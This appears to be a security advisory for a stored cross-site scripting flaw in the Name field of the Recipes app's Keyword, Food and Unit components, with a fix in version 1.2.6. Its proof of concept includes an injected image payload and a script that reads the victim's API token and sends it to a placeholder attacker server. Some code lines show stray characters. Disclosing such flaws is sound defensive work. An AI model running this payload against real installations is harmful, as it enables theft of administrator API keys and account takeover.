Overview
In Recipes, versions 0.17.0 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in the ‘Name’ field of Keyword, Food and Unit components. When a victim accesses the Keyword/Food/Unit endpoints, the XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.
Details
In Recipes, versions 0.17.0 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in the ‘Name’ field of Keyword, Food and Unit components. When a victim accesses the Keyword/Food/Unit endpoints, the XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.
PoC Details
Access the application through a web browser and login as a user. Now navigate to the food list from the navigation bar. On the food list page, click on the plus '+' icon. Under the name input field, enter the XSS payload given in the "POC Code" section below and save it. Then host the JavaScript file for fetching the victim's API (the code for the JavaScript file can be found in the "POC Code" section below). In a new browser window, login as administrator and access the food list page (for example). This will trigger the XSS payload and the attacker will receive the admin's API key in the listener.
PoC Code
XSS payload:
<img src=a onerror="var x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.appendChild(x);">
JavaScript file (api.js):
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/settings/',true);
req.send();
function handleResponse() {
t var a=this.responseText.match(/Authorization: Token.{1,}/)[0];
t a=a.split("Token ")[1];
t a=a.split("<")[0];
t console.log(a);
t var changeReq = new XMLHttpRequest();
changeReq.open('get', '<attacker_server>:<attacker_port>/api='+a, false);
changeReq.send()
Affected Environments
0.17.0 through 1.2.5
Prevention
Update version to 1.2.6 or higher